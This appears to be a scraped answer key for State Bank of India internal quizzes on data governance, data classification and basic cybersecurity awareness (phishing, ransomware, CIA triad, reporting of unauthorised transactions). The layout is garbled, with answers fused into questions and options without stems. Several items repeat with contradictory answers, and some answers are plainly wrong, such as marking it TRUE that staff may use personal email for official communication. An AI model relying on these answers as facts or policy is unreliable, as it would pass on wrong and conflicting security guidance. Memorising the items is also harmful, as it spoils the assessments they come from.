DG Key

As per the Data Governance Policy, Data Governance Officer (DGO) needs to be
nominated/designated at -
All the above

Item 5
Data Processes especially for compliance reasons does NOT include which one of the
following?
Interpretation Processes
Item 15
What is/are the responsibility(ies) of the Apex level Data Governance Council (ADGC)
All of the above

Item 19
Data Governance ensures that Data is Accessible to _____ set of People
Intended
Item 27
Data Custodians are responsible for the safe custody, transport, storage of the data and
implementation of business rules. Which of the following is Data Custodian?
Respective IT Department
Item 6
Robust Data Management practices does NOT involve which one of the following?
Punishment
Item 11
Which of the following activity are considered under Data Management?
All of the above

Item 7
Customer sensitive Granular Data can be copied and stored without any approval
FALSE
Item 6
Restricted access to Data means:
Both 1 & 2
Item 10
For personal communication, we can use our official email IDs
FALSE
18
Which of the following may not be the signs that the Mobile Phone (Android/iOS) is hacked?
All statements are signs that the Mobile phone is hacked

Item 15
The objective of setting up a wide network of ATMs across the country resembles which of the
following triad of CIA?
Availability
Item 20
Which of the following best describes the Supply chain attack?
Supply chain attack occurs when hackers infiltrates systems through an outside partner or
provider who has access to the target systems and data
Item 25
While doing an ATM transaction, a customer is required to use a physical card provided to him
by the Bank and also a PIN code to authenticate the transaction. This practice ensures which of
the following triad of Information Security?
Confidentiality
Item 4
Which of the following statement(s) is false?
Option a & b
Select the wrong statement.
Browse the Internet on company devices using system admin credentials only
Item 30
The time at which the cyber incident is brought to the knowledge of any official of __________
shall be treated as time of detection of incident.
Information Security Dept. CC Mumbai

Item 24
What are the parameters on which compensation to customer will depend for resolution of
unauthorised transactions complaints?
Time of Reporting to Bank/Fi & Type of transactions (ATM/UPI/INB)

Item 12
What are the main sources for low Data Quality?
All of the above
Data Governance Policy is applicable to all the domestic offices of SBI including:
All of the above
Good Data Governance practices are also applicable to third parties having access to SBI
network and Data.
TRUE
Item 4
Data Governance Organisation involves a multi-tiered combination of business and technology

roles which include(s)
All of the above

Item 5
While creating new CIF, customer has given marital status, but as it is not mandatory in CBS:
As the customer has given the details in AOF, teller should fill the same in CBS
Where does Data come from?
People, Process and Technology

Item 7
Data is always originated within the organization
FALSE
Item 8
Data Governance Vision identifies Data as :
Consistent
Data Governance Council-Business Unit/Vertical is being headed by
DMD
Item 10
(i) Data Governance is about the rules how to manage the data
(ii) Data Privacy is about the rules how to protect and use the data
Both (i) & (ii) are correct
Data Management Office (DMO) is headed by
GM & CDMO
Item 12
As per the Bank's Data Governance structure, presently which is the Apex body for Data
Governance?
Apex level Data Governance Council (ADGC)

Item 13
Who would be held responsible for not feeding all the customer details in CBS, given by
customer in AOF.
1& 2
Item 14
Master Data Management Process Includes ______
All of the Above

Item 15
Design of better Analytics based products mainly depends on ________
Data Quality
Item 16
Who Provides directions in Data Governance Organisation?
Apex Data Governance Council / Data Governance Executive Council

Item 17
Which among the following play major role in support of company-wide Data quality initiatives?
Regulators
Item 18
Data processes must also put in place ______
All of the Above

Item 19
_________________is ultimately accountable with regard to Data quality and value of Data in a
given subject area.
.
DMO
Item 20
Analytics refers to the process of using Data in order to:
All of the above

Item 21
Capturing of correct & complete data at the ____ time and ____ time should be the Mantra for
quality data
first,every
Item 22
Providing training to staff is one of the responsibilities of Data Management Office
FALSE
Item 23
Data Governance Journey in SBI started with ___
Approval of Data Governance policy by the Central Board

Item 24
Data Quality Tools and Applications come under which one the following factors of Data
Management Practices?
Process
Item 25
Data Governance ensures Integrity of the data as ____
Single Source of Truth

Item 26
As per its objective, minimizing data errors trough Data governance bring in overall _______ in
the organization
All of the above

Item 27
Technology Solutions which help in data Governance initiatives include ______
All of the Above

Item 28
As per Interim arrangement CDMO reports to ___
CGM (ESS)
Item 29
Who can be called Data Stakeholders
All the above

Item 30
Data Governance Policy is applicable to
All employees of the Bank
Data Stakeholders also includes ______
All of the above

Item 25
Circle Data Governance Council (C-DGC) is headed by
CIRCLE CGM
Data Governance objective is to maintain Data in _____ form
Structured
Item 3
Data Governance Council (DGC) as per the approved interim arrangement is headed by:
DMD & CIO

Item 2
Data Governance Vision identifies Data as :
Consistent em 22
What is the frequency of the meeting for Apex level Data Governance Council (ADGC) as per
the interim arrangement?
Quarterly
Item 21
Incorect handling of data may result in exposing an organization to significant liabilities.
TRUE
Item 25
Data-driven business decisions are possible when _____ is involved in the Data Governance.
Business Unit
Item 17
For official communication , we can use our personal email IDs
FALSE
Item 23
Which of the following is NOT a type of Customer Sensitive Data
List of Top Management of the Bank

Item 25
Which of the following are examples of Sensitive Information:
All of the above
Select the wrong statement in case of transaction through Retail Internet Banking.
Bank sends SMS after every transaction, when the Profile section is accessed, a third party /
beneficiary is added
Item 6
What is Distributed Denial of Service Attacks?
It is an attack is a malicious attempt to disrupt the normal traffic of a targeted server, service or
network with a flood of Internet traffic from multiple computers at the same time
Item 9
Which one of the following is a unique feature of APT attacks?
An unauthorized attacker code enters a system and remains there for an extended period of
time
Item 12
Sending SMS messages to many people with bad intentions may be termed as __________.
Smishing
Item 15
Which of the following channels is not available for blocking the UPI services for unauthorized
transactions?
YONO
Item 13
_______ is a type of attack in which malicious scripts are injected into websites and web
applications for the purpose of running on the end user's device.
Cross site scripting

Item 3
After completion of a Cash withdrawal transaction at an ATM, the system ensures to update the
customer’s balance with the withdrawal transaction before displaying it on the screen or printing
the receipt. This process is similar to which of the following triad of CIA?
Confidentiality
Item 6
You need special software to access this part of the Web because a lot of it is encrypted, and
most of the pages are hosted anonymously". Which of the following the statement refers
to?
Dark Web
Item 11
Which of the following statements is false?
The user’s response to bulk SMS can compromise their identities.

_____ is a technique used by the fraudsters, wherein they are used to penetrate a system
where the program/script/files will be hidden within another file.
Steganography
Customer has given a written standing instruction to debit ₹ 20,000 every month from his salary
account as EMI payment to his Home loan account. To cover the property insurance amount,
the Loan officer has changed the amount to ₹ 20,500. Which one of the following is violated?
Integrity
Item 21
Who is primarily responsible for reporting cyber security incidents ?
Deputy General Manager (AC) at LHO
For online meetings, share a link to a meeting on an unrestricted publicly available social media
post, only with password
EMV chip cards are vulnerable to Skimming

Item 19
Change password only when you suspect it has been compromised.

Item 2
If a customer reports an unauthorised transaction of Rs.6000/- (ATM) on the 5th working day. It
is a case of third party negligence. As per Limiting Liability of customer, what will be the liability
of customer in this case?
Rs.6000/-
Item 8
Which of the following incident(s) should be reported to RBI, CERT-In & NCIIPC?
All cyber incidents irrespective of amount of loss

Item 9
Select the wrong statement about Desktop / Laptops /Workstations Usage?
Unauthorized personnel can access and exploit your system
It is not necessary to inform your organization always, if you come across any discrepancies.
Item 12
Which of the following options is not the best password security practices?
Do not share passwords with anyone other than IT staff and only at the time of
troubleshooting/maintenance of systems/software.
Item 16
How many times can you can change the username in Retail Internet Banking?
Username once created cannot be changed

Item 21
After how many days of customer complaint, shadow reversal given to customer account in our
Bank?
On 10th working day from date of customer complaint
If a Bank always allow some of the employees to bring their own laptops, smart phones, tablets
I
etc. to office for office work. This policy is called BYOD. What does BYOD stand for?
Bring Your Own Device

Item 26
WannaCry was ____________ attack.
Ransomware
If an ATM Skimming happens at any ATM, who can report to IT Team?
Anyone
Item 3
Which one of the following options is not a violation of acceptable usage policy?
Receiving mails from his batchmate

Item 9
Which one of the following applications is not a threat to compromise confidentiality of the data
of portable devices?
Air watch agent

Item 20
Change password only when you suspect it has been compromised.

Item 24
If you have a Facebook account and you came to know about a breach in the Facebook server,
what will be your action?
Change the password of Facebook and all the services/apps offered by Facebook.
As part of IS awareness and commemoration of Computer Security Day, SBI did NOT organize
which one of the following activities?
Cold calling all the employees

Item 17
Apex level Data Governance Council (ADGC) as per the approved interim arrangement is
headed by ____
MD (R&DB)
Item 4
MODULE 1
QUESTIONS ANSWER
(i) Data Governance is about the rules how to build the content.(ii) Data Privacy is about
Both (i) & (ii) are incorrect
the rules how to protect and use the content.
_________________is ultimately accountable with regard to the definition, Data quality
Data Custodian
and value of Data in a given subject area.
________shall ensure that there is commensurate adherence,management and periodic
upkeep/review for Data in their respective custodies, asprescribed by Data Governance Data Owners
Policy
Administrative office Data Governance Council (A-DGC), is headed by DGM (B&O)
Against availability of sizeable number of eligible customers only few confirmed leads could
Poor Data Quality
be generated for an Analytics based product. What could be the underlying reason?
Apex level Data Governance Council (ADGC), is headed by CHAIRMAN

As per the Bank's Data Governance structure, presently which is the Apex body for Data
Apex level Data Governance Council (ADGC)
Governance?
As per the Data Governance Policy, which of the following is the Data Custodian Respective Business Unit
Capturing of correct & complete Data at the ____________ should be the Mantra first time and every time
Capturing of incorrect / incomplete Data adversely affects: Both 1 & 2
Circle Data Governance Council (C-DGC) is headed by CIRCLE CGM
Data Governance can NOT be achieved by Technology alone. TRUE
Data Governance Council (DGC) is presently being headed by CHAIRMAN
Data Governance does NOT refer to which one of the following term? Practices
Data Governance includes All of the above
Data Governance is aligned with which one of the following departments? Business Unit
Data Governance Organisation involves a multi-tiered combination of business and
All of the above
technology roles which include(s)
Data Governance Policy is applicable to All employees of the Bank
Data Governance Policy is applicable to all the domestic offices of SBI including: All of the above
Data Governance Policy is applicable to third parties having access to SBI network and
TRUE
Data.
Data Governance Policy is formulated by which Department: Data Management Office
Data Governance process includes activities as: All of the above
Data governance processes primarily must focus on __________ MIS Needs of Top Mgmt.
Data Management Office (DMO) is headed by GM & CDMO
Data Management Office reports to which of the DMDs DMD & Chief Information Officer
Data Processes especially for compliance reasons does NOT include which one of the
Interpretation Processes
following?
Data processes must Include ____________ Definitions of how data will be accessed
Data Protection officer reports to ….. GM & Chief Data Management Officer
Data Quality Tools and Applications come under which one the following factors of Data
Technology
Management Practices?
Data-driven business decisions are possible when _____ is involved in the Data
Business Unit
Governance.
DBAs are NOT part of Data Stakeholders FALSE
Design of better Analytics based products mainly depends on ________ Data Quality
In Data Management, CDE refers to- Correct Data Entry
Incorect handling of data may result in exposing an organization to significant liabilities. TRUE
Master Data Management Process Includes ______ All of the Above

Poor Data Quality may result in ______ Incorrect Regulatory Reporting
Prime objective of Data governance framework is to ensure- All of the above
Process for submission and handling of the Data request is mentioned in Data Governance Policy
Providing training to staff is one of the responsibilities of Data Privacy Officer TRUE
Robust Data Management practices does NOT involve which one of the following? Punishment
The primary priority of Data Processes must be _____ MIS Needs
The word “Data” shall collectively refer to the following descriptions: All of the above
What is the frequency of the meeting for Apex level Data Governance Council (ADGC)? Quarterly
What is the frequency of the meeting for Data Governance Council-Business Unit/ Vertical
Quarterly
(DGC-BU/V)?
What is/are the responsibility(ies) of the Data Governance Council (DGC) All of the above
Where does Data come from? People, Process and Technology
Which among the following may be held accountable for quality of data? Practices
Which among the following play major role in support of company-wide Data quality
People
initiatives?
Which among the following play major role in support of company-wide Data quality
Procedures
initiatives?
Which of the below helps in monitoring Data Governance Activities? Data Quality
Which of the below helps in monitoring Data Governance Activities? Data Process
Which of the following is/are a Key Data Quality Dimension? Accuracy
Which one of the following does NOT come under People factor in Data Management
Data Trainers
prctices?
While creating new CIF, customer has given marital status, but as it is not mandatory in As the customer has given the details in
CBS: AOF, teller should fill the same in CBS
While creating new CIF, customer has given marital status, but as it is not mandatory in As it is non- mandatory, teller should not fill in
CBS: the details in CBS
Who among the following has a role to ensure that data governance initiatives are aligned
Business Units
with business needs
Apex Data Governance Council / Data
Who Provides directions in Data Governance Organisation
Governance Executive Council
MODULE 2
QUESTIONS ANSWER
“Card Holder Details, CIF, Account Information (credentials, balance, transactions,
SENSITIVE
premiums, dividends, etc.)” are classified as
“Internal audit reports” is classified as ____________ Data CONFIDENTIAL
“SBI telephone directory” is classified as ____________ Data PUBLIC
“SOP on Data Sharing with External agencies/ Third Parties” rests on four pillars, which
one of the following is NOT one of these four pillars:
“Training materials and manuals” are classified as ____________ Data INTERNAL
DOB on OVD and AOF to be checked, even
A customer has submitted Driving License as OVD, along with AOF. During the scrutiny, it
then he is less than 18 yrs, OVD not to be
was found that the age of customer is less than 18
accepted
A customer has submitted Voter Card as OVD, along with AOF. During the scrutiny, it was DOB on OVD and AOF, if same, then only
found that the age of customer is less than 18 account may be opened
A staff can be held accountable for Data quality errors. TRUE
An SBI Card employee sitting in an branch asks for list of high value customers along with
Mobile numbers for telecalling to sell SBI cards for the Branch. Branch may share the list TRUE
with SBI Card employee.
As per Data Protection Bill (Draft) PII stands for Personally Identifiable Information
Branch has sanctioned a Car loan to one of his staff, but the loan instalment was not fed in Recovery to staff loan should be through
HRMS. The staff paid the instalment through his account and informed the BM that a SI HRMS only, so recovery details in HRMS
has been registered for the same. needs to be updated
Can we store customer data on our Desktop ? NO
Capturing of incorrect security in secured loan accounts may result in _____________. Both 1 & 2
Customer Sensitive Granular Data made available through SSO to ensure an audit trail
Need to Know
comes under which one of the following?
Data Quality Index (DQI) dashboard measures the Data Quality for- CIFs & Loans
Data quality is necessary to fulfil the needs of an organization in terms of All of the above
DQI dashboard displays errors All of the above
DQI Index has been included as one of the Key Responsibility Areas (KRAs) in Career
Development System (CDS TRUE
Error categories in DQI for CIF related errors are: A. Risk categorization B. Personal Profile
A, B, C, D & E
C. PAN Related D. Gender Related E. Age Related
For official communication , we can use our personal email IDs TRUE
For personal communication, we can use our official email IDs FALSE
If a car dealer asks us for a list of customers having existing car loans, to market loans for
Cannot be shared
new cars for us, shall we share the list?
Impact of poor Data Quality on a Branch include ____ Both 1 & 2 above
In ________________ Processing, small group of transactions are processed on demand Batch
In an Account Opening Form, if Data has been provided by customer in non mandatory Input the Data exactly as given by the
field ( like mobile number /email ID ), what should be done while inputting in CBS? customer
In the Data Infringement portal, unattended infringements on Data Loss Prevention (DLP) Penal Score (1 to 4 marks) in RFIA of the
may result in_____ Branch
Incorrect spelling of Customer name comes under which one of the following Data Quality
Accuracy
Dimension?
Non capturing of PAN in CIF, even if furnished in the AOF, may result in ________. Both 1 & 2
Non-sensitive Information includes: Public Information
Restricted access to Data means: Both 1 & 2
Scope of Customer Sensitive Granular Data Sharing & Access Framework covers: All of the above
Sharing of customer sensitive granular Data is governed by which Policy : Data Governance Policy
SOP on Data Sharing with External
Sharing of Data with exernal agencies is governed by
agencies/third parties
Some of the key Data Privacy initiatives include: All of the above
Some of the key Data Privacy initiatives include: Secure Cloud Data Storage system
The access to Customer Sensitive Granular Data to the users should be made strictly on
Both 1 & 2
the basis of-
To boost the housing loan business of the branch , list of HNIs can be shared with HLCs
Not to be shared
through:
SENSITIVE, CONFIDENTIAL, INTERNAL,
What are the different categories of Data Classification
PUBLIC
What are the impacts of feeding incorrect date of birth of a customer in CBS 1& 2
What are the impacts of not verifying the pop-up name of PAN holder, while fetching PAN
1& 2
details
What are the possible means by which Customer Sensitive Granular Data can get divulged
All of the above
or leaked to any unrelated person / third party like vendors, dealers etc:
What does GDPR stand for- General Data Protection Regulation
What is needed to create Data Quality Index? Dashboards and scorecards.
What is/are the possible consequences of Data Leakage: All the above
Which of the following is NOT a type of Customer Sensitive Data List of Top Management of the Bank
Which of the following is not a type of Data leak Improper categorization of sensitive Data
Which of the following is true: All of the above
Which one is NOT an approved way of sharing granular Data/access Data under normal
E-mail
circumstances:
Which Portal to be accessed for Data Loss Prevention (DLP) incidents Data Infringement Portal
"From & To" date in the temporary screen
While inputting temporary address of a customer in CBS, it should be taken care that needs to be filled in as declared by the
customer
While verifying the pop-up name of PAN holder in CIF creation screen 1&3
MODULE 3
QUESTIONS ANSWER
__________ malware is a warning-like popup or reminder in a Laptop/PC/Mobile? Scareware
_____________ is a technique used by the fraudsters, wherein they penetrate a system
Steganography
where the program/script/files will be hidden within another file.
_____________is used for obtaining unauthorized access to mobile phones via Bluetooth
connection. Once such a connection is established then the attacker will be able to steal Bluesnarfing
photos, messages and contacts etc.
“You need special software to access this part of the Web because a lot of it is encrypted,
and most of the pages are hosted anonymously”. Which of the following the statement Dark Web
refers to?
Social engineering uses Human traits,
A fraudster may use Social engineering techniques to steal critical information of a user.
Curiosity, Concern around and technical
Which of the following options is not true in case of social engineering?
hacking techniques
After completion of a Cash withdrawal transaction at an ATM, the system ensures to
update the customer’s balance with the withdrawal transaction before displaying it on the Availability
screen or printing the receipt. This process is similar to which of the following triad of CIA?
Ajit is doing a merchant transaction to pay the mobile bill. He selects net banking of SBI for
making online payment. He is redirected to a site of SBI. Before he logs in what should be It should start with https://www.onlinesbi.com
the website address on the screen.
Even if a user compromises his/her login credentials of OnlineSBI, no one can login using OTP has been made mandatory at the time
this credential. What is the new security feature in OnlineSBI? of login
If a Cyber attack is carried out by sending to SBI's customers an email that claims to be
Phishing Attack
from SBI but it's not, then what kind of cyber attack technique is it?
If a hacker manages to exploit the vulnerability before software developers can find a fix,
Zero day attack
that exploit becomes known as a _______.
If you click on the padlock sign in the Address bar. Which of the following information will You will get information on who owns the site
be available to you? and who has verified the site
In Social engineering attacks, the fraudsters lure/appeal the potential victims to gain
confidence to reveal confidential information and use the same for fraud and system APT attacks may be identified immediately as
access. it shuts down the whole system
After 3 invalid attempts, the user id is
Mr. Ajay had tried to login to Mr. Deepak's SBI net banking. He tried thrice but failed. Now
automatically locked for one day. Thereafter
when Mr. Deepak tries to login with his correct password will he be able to do so?
Mr. Deepak can login.
Non-repudiation is carried out through the services of authentication, authorization,
Secure encryption of the information
confidentiality, and integrity. Confidentiality ensures which one of the following?
Pretending to be an Airtel customer service executive and contacting the victim is
Vishing
called____________.
Select the correct statement about the impact of Cyber Risks. All are true
Deep Web - Research Papers & Medical
Select the incorrect option.
Records
Select the wrong statement. Option a & b
Cyber Security primarily focuses on
Select the wrong statement. protecting employees information on
computers
Sending SMS messages to many people with bad intentions may be termed as
Smishing
__________.
Social Engineering Attacks does not include ________________. Denial of Service attack
The data loss or compromise while charging the mobile is called________. Juice Jacking
The fraudster gets the personal details of the people through _______technique. Social engineering
The malware, which can record the keystrokes on a keyboard in order to gain access to
Keylogger
sensitive information is known as________________malware.
The objective of setting up a wide network of ATMs across the country resembles which of
Availability
the following triad of CIA?
The technique used to send the emails to all the employees of the Bank is known as
Spear Phishing
____________.
Third party systems have less robust security
Third party attacks are attractive to hackers, because ____________.
controls
What is a “Collect Request” in a UPI transaction? It is a feature available in BHIM SBI Pay
It is a surveillance software that records
What is a keylogger? every keystroke made in the system, creates
a file and sends it to a specified server.
It is a malicious attempt to disrupt the normal
traffic of a targeted server, service or network
What is Denial of Service Attacks?
with a flood of Internet traffic from multiple
computers at the same time
It is an attack which is a malicious attempt to
disrupt the normal traffic of a targeted server,
What is Distributed Denial of Service Attacks? service or network with a flood of Internet
traffic from multiple computers at the same
time
Disabling data transfer mode in Settings will
What is not true about Juice-jacking?
not help in this case
What is not true about myths associated with Cyber Risk? Cyber threat always starts externally
What is not true about SIM Swapping? SIM Swapping is also known as SIM cloning
Fraudsters get access to the root of the
What is not true about SIM Swapping?
mobile phone through SIM Swapping
The hackers through one malicious code in
What makes SolarWinds attack an unusual hack? SolarWinds Orion software gained access to
thousands of other companies.
This attack was designed to impact one
What makes SolarWinds hack one of the biggest and the most dangerous Cyber attack?
vendor and subsequently all their clients
Lock User access option is available in the
Where is the option to lock user access in SBI Retail Internet Banking?
login page of Retail INB
Which of the following attacks is not categorised under Exploit based attacks? Distributed Denial of Service attacks
Supply chain attack occurs when hackers
infiltrates systems through an outside partner
Which of the following best describes the Supply chain attack?
or provider who has access to the target
systems and data
Which of the following browsers allows access to the Network which is popular for
Tor
implementing encrypted routing technology and preventing user tracking?
Which of the following channels is NOT available for blocking the UPI services for
YONO
unauthorized transactions?
It offers a high level of assurance that the
information, objects and resources are
Which of the following is NOT an objective of Non-repudiation?
accessible to authorized subjects within the
promised timeframe.
Which of the following is not the examples of data? All are examples of data
Which of the following may not be the signs that the Mobile Phone (Android/iOS) is All statements are signs that the Mobile
hacked? phone is hacked
Which of the following Mobile Apps may be suggested to resolve the issues related to non-
SBI Secure OTP
receipt of OTP (Through SMS) for their transaction?
Check your physical hardware, keep your
Which of the following options is not to protect yourself from keyloggers? system locked and protect from unauthorised
access.
Which of the following principles of the second of CIA Triad Integrity is/are
Correct?a.Integrity is the concept of protecting the accuracy and completeness of
information and processing methods. b.Integrity protection prevents any kind of alteration
of the information. c.Properly implemented integrity protection provides a means for
authorized changes while protecting against intended and malicious unauthorized activities a, c and d
(such as viruses and intrusions) as well as mistakes made by authorized users (by
commission or omission). d.Use of a secure Hashing algorithm for the information ensures
Integrity.
Which one is not an option for disabling UPI services? YONO Main Screen UPI Enable/Disable UPI
The website address should start with https
Which one of the following is a good safety measure, while using www.onlinesbi.com?
and there should be a padlock sign
Check if any extra suspicious device is
Which one of the following is a precautions to be taken while operating the ATM? attached to the ATM machine
An unauthorized attacker code enters a
Which one of the following is a unique feature of APT attacks? system and remains there for an extended
period of time
Which one of the following is the leading illicit dark web marketplace which was taken down
Silk Road 2.0
by the FBI in what was considered then as a significant action on the Dark web market?
Which one of the following risks is not considered while evaluating a third party vendor for
Market Risk
risk assessment?
A type of cyberattack where an unauthorized
Which one of the following statements is FALSE about APT attacks? attacker code enters a system and remains
there.
The user’s response to bulk SMS can
Which one of the following statements is false?
compromise their identities.
Continuous assessment of Vendor security
Which one of the following statements is more appropriate in terms of Vendor risk
practices need to be done throughout the
assessment?
Contract life cycle.
With the enhanced sharing of information over a global network for almost all life functions
, which one of the following has become the latest addition to the essential objectives of Non-repudiation
Information Security after the CIA Triad?
Your friend fears that he has shared the user credentials of OnlineSBI with a stranger. It is Contact the Branch on Monday to deactivate
a Sunday and Bank is closed. What immediate steps would you NOT advise him? INB facility
MODULE 4
QUESTIONS ANSWER
“Ransomware” can be spread through_____________? Option 1 and 2
After how many days of customer complaint, shadow reversal given to customer account in On 8th working day from date of customer
our Bank? complaint
As part of IS awareness and commemoration of Computer Security Day, SBI did NOT
Cold calling all the employees
organize which one of the following activities?
As part of IS awareness, SBI observes Computer Security Day on which of the following
30th November
day?
Creating IS awareness is important at all levels in the Bank. But the initiation should start
Branch staff
from _______________.
Customer reported an unauthorised UPI transaction of Rs.72,000/- in his account. He
reported the incident on the same day to the bank. The bank is not able to establish
customer negligence even after completion of 90 days from the date of complaint. As per Rs.72,000/-
Limiting Liability of customer guidelines, how much amount does the Bank needs to pay to
the customer in this situation?
The free WiFi could be a rouge network,
Identify some of the risks involved in using public free WiFi.
harvesting the internet user’s data.
If a Bank always allow some of the employees to bring their own laptops, smart phones,
tablets etc. to office for office work. This policy is called BYOD. What does BYOD stand for?
If a customer reports an unauthorised transaction of Rs.6000/- (ATM) on the 5th working
day. It is a case of third party negligence. As per Limiting Liability of customer, what will be Nil
the liability of customer in this case?
If ATM Skimming happens at an ATM, who can report to IT Team? Anyone
If you have a Facebook account and you came to know about a breach in the Facebook Change the password of Facebook and all
server, what will be your action? the services/apps offered by Facebook.
Impact of Cyber risks are_________________. All of the above
Many websites use CAPTCHA to avoid password guessing by automated tools called
Dictionary Attack
____________.
Passwords must be created using small &
Pick the odd one. upper case, when own name or short form of
own name and own initials are used.
Anti-virus is crucial for safety of data. While
Select the correct statement about Desktop / Laptops /Workstations Usage? leaving the room user is supposed to put the
laptop for scanning.
The motive for this Ransomware attack is
Select the correct statement in this case always monetary
Unauthorized personnel can access and
exploit your system
Create a shortcut of a document/file instead
of copying it on the desktop
Select the wrong statement about the Acceptable usage policy (IS Policy) of our Bank? All are true
Select the wrong statement from the below statements.(i) Lock your phone with mPIN or
password OR biometric when not in use. Always keep your mobile device in a safe
location.(ii) Download the Mobile Banking application only from the Bank’s site –
www.sbi.co.in. For using Mobile Banking service over insecure Wi-Fi, never click on any
links. Always type the URL http://mobile.prepaidsbi.com/sbiwap/ in your mobile browser(iii) All are correct
Check your linked accounts on a regular basis. Once your transaction is over, logout of the
mobile banking website and then close the browser. (iv) Delete any SMS from the Bank
that might contain your personal information like user Id, mPIN received at the time of
registration, or details sent to you. Do not part with your ATM card and PIN as this may be
misused for Mobile banking registration.
Password need not be necessarily be
complex but easy to remember.
You can restrict the use of ATM card details
Select the wrong statement. for online transactions in Corporate Internet
banking
For web security, verify full URL by clicking
Select the wrong statement. the link, but do not give any
personal/confidential information
It is not necessary to inform your
Select the wrong statement. organization always, if you come across any
discrepancies.
For online meetings, share a link to a
Select the wrong statement. meeting on an unrestricted publicly available
social media post, only with password
The company asked their employees to use their own devices and internet access while
working from home. List some precautions that they could have exercised even under
these conditions: (i) Ensuring that authorized antivirus is installed in the devices of the Options (i) , (ii) and (iii) are necessary
employees (ii) Ensuring that appropriate software patches are updated in the devices of
the employees (iii) Asking the employees to use enterprise VPN
WannaCry was ____________ attack. Ransomware
Negligence that causes the unauthorized
What are the parameters on which compensation to customer will depend for resolution of
transaction & Reporting time about
unauthorised transactions complaints?
unauthorized transaction to his/her Bank/FIs
What are the ways you can report an unauthorised transaction (ATM) without visiting the Call dedicated number 1800 1111 09 also
branch? Can raise through https://crcf.sbi.co.in
Time at which, the incident is brought to the
What is the “Time of detection of incident” for reporting the purpose of a cyber incident to
knowledge of any official of ISD, including
RBI, CERT-In & NCIIPC?
CGM & Group CISO
Reversal of loss amount to customer account
if Bank fails to establish customer negligence
What is the meaning of Shadow Reversal?
within 10 days, but it is allowed to withdraw
by customer
All cyber security incidents should be
What is the timelines for reporting of cyber incidents to RBI and other Statutory Authorities
reported within 2 to 6 hours by Incident
CERT-In & NCIIPC? Who should report the incident?
Response & Management Team
What should be the minimum and maximum length of the login password in Retail Internet Minimum length should be 8 characters and
Banking? maximum length 20 characters
Option to change login password is in the
Where is the option to change the Login password in Retail Internet Banking?
Profile section, post login
Phishing / Vishing attacks on customers
Which of the following incident(s) should be reported to RBI, CERT-In & NCIIPC? resulting cumulative loss for the customer(s)
exceeding ₹ 50 lakh
Confidential or secret information with a
Which of the following is NOT inappropriate content of email? password protection when transmitted over
email.
Which of the following is NOT one of the best practices to maintain your password? Only difficult dictionary words should be used
Use of other officers' user ids or using a false
Which of the following options is an example of inappropriate use of the e-mail service?
identity.
Which of the following options is crucial in any UPI fraud related to Collect request? option a & b
You can use unsecure or open Wi-Fi for
Which of the following options is NOT a good wi-fi security practice?
official purposes in case of emergency
The User is responsible for any e-mail that is
Which of the following options is not a violation of acceptable usage policy?
transmitted using the e-mail
The Profile password should be a
Which of the following statements is correct regarding creation of Profile password using
combination of alphabets (in the language
the Multilingual Image based Virtual keyboard?
chosen), and numerals and images
Which of the following statements is not true about Acceptable usage policy (IS Policy) of Employee’s mobile devices need not have
our Bank? Antivirus software
Ensuring the physical access to the systems
Which of the following steps would not be a part of the planning for Work from home?
room is restricted and monitored
Which of the following will not be considered as cyber incidents for reporting to RBI? All the options will not be considered
A training awareness program that would
Which one of the following is the most important aspect for an organization as big and
provide education and guidance on a range
global as SBI to protect itself from cyber security attacks and subsequent loss of brand
of information security topics to all the
image?
internal users of its systems and applications.
However, Mobile and laptop given to the staff
Which one of the following options does not substantiate the Acceptable Usage Policy of for personal holding have exceptions to the
our Bank? policy.
Users are responsible for all activities
Which one of the following options is not a concern for password security?
originated from their User credentials
Which one of the following options is not a violation of acceptable usage policy? Receiving mails from his batchmate
Which one of the following options is not doable as per user acceptance policy?
The updates in the operating systems (say
Android, iOS etc.) and installed applications
might compromise the security of these
Which one of the following statements is not a threat to mobile and portable devices? devices.
Anyone who knows about cyber incidents
Who can report cyber incidents to Information Security Department (ISD)? including general public
Who is primarily responsible for reporting cyber security incidents ? Deputy General Manager (AC) at LHO
With every data breach or phishing attack, cybercriminals gain access to more data. Users
Change the password
should ___________________ after knowing about such attacks.
LESSON 1

DGM & CFO
GM NETWORK
DGM AND CDO
CIRCLE CGM

All employees at Audit departments
All employees at Data Management Office
All employees at Corporate Centre

Create
Read
Modify & Delete
All of the Above
Which one of the following does NOT come under People factor in Data Management prctices?
Data Architects
Data Owners
Data Trainers
Data Stewards
Which activity are considered under Data Management?

Handling complete Data of Organisation
Boost up Organisation Performance
Assure Data quality
All of the above
Data Governance Policy is applicable to third parties having access to SBI network and Data.
As per Vendors agreement
FALSE
TRUE
Not declared in policy
Data Protection officer reports to …..

CGM (R&DB Ops)
GM & Chief Data Management Officer
CGM (Compliance)
Chief Vigilance Officer
Which among the following may be held accountable for quality of data?
People
Processes
Practices
Technology
Data Management with lack of easy access to information for important stakeholders may result in just _________
Data Governance Strategy
Big Data Strategy
Narrow Data Strategy
None of the Above
Apex level Data Governance Council (ADGC), is headed by

DMD COO
CHAIRMAN
CDMO
MD (R&DB)
The word “Data” shall collectively refer to the following descriptions:

Data that are stored or held in servers in SBI, Data storage devices and backup media
Data owned by the Bank which are securely stored/ managed by the third party.
Data owned by the Bank which is shared with the third party
All of the above
Inconsistent Data in Annual Income fields vis a vis customer profile may primarily result in ________
Incorrect AML/CFT compliance
In-efficient Cross-selling
Improper KYC
None of the Above
____ is DGO of Circle

DGM & CCO
DGM (Vigilance)
DGM & CFO
DGM & CRO
Poor Data Quality may result in ______

Inorganic Growth in Business
Increased Customer stickiness
Incorrect Regulatory Reporting
All of the Above
Capturing of incorrect / incomplete Data adversely affects:

Data Quality
Analytical Models
Both 1 & 2
Neither 1 nor 2
Prime objective of Data governance framework is to ensure-

Compliance with relevant legislation, regulatory requirements, policies, procedures and standards.
To define the roles and responsibilities for Data stakeholders, and to establish clear lines of accountability.
Effective assurance and control of Data management processes.
All of the above
What is the frequency of the meeting for Apex level Data Governance Council (ADGC)?
Monthly
Quarterly
Half yearly
Bi monthly

Anlytical Processes
Co-ordination Processes
Monitoring Processes
All of the Above
Data Management Office reports to which of the DMDs

DMD & Group Compliance Officer
DMD & Chief Information Officer
DMD & Chief Risk Officer
DMD & Chief Operating Officer
Providing training to staff is one of the responsibilities of Data Privacy Officer

FALSE
TRUE
Administrative office Data Governance Council (A-DGC), is headed by

RM
DGM (B&O)
AGM/CM GB
GM NETWORK
Data processes must Include ____________

Definitions of how data will be stored
Definitions of how data will be analysed
Definitions of how data will be interpreted
All of the Above

External Parties
Magically
Logs and devices

Definitions of how data will be reported
Definitions of how data will be accessed
All of the Above
